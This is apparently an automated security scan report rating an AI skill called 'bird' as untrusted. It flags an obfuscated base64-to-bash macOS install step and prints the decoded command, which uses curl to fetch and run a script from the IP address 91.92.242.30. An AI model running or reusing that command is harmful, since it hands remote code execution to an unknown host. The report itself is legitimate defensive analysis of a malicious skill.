Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Script Execution via base64 | bash, Obfuscated Command in Installation Instructions.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-yf/SKILL.md:10 | |
| CRITICAL | Obfuscated Remote Script Execution via base64 | bash The MacOS installation command provided in the skill decodes a base64 string and pipes it directly to `bash`. The decoded string is `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`. This command downloads and executes an arbitrary shell script from an unverified IP address (`91.92.242.30`). This allows for arbitrary code execution from an untrusted source, posing a severe command injection risk and a critical supply chain vulnerability. Remove the malicious installation command. Provide a secure, verifiable installation method, preferably through official package managers or signed binaries. Avoid direct execution of scripts from untrusted or obfuscated sources. | LLM | SKILL.md:15 | |
| HIGH | Obfuscated Command in Installation Instructions The MacOS installation command uses base64 encoding (`base64 -D | bash`) to hide the actual shell command being executed. This obfuscation technique makes it difficult for users and automated analyzers to understand the true intent and potential risks of the code being run, which is a common tactic for concealing malicious payloads. All installation commands should be clear, directly readable, and transparent. Avoid any form of obfuscation that prevents immediate understanding of the code's function. | LLM | SKILL.md:15 |
Scan History
Embed Code
[](https://skillshield.io/report/cf333d5ab8fb8d06)
Powered by SkillShield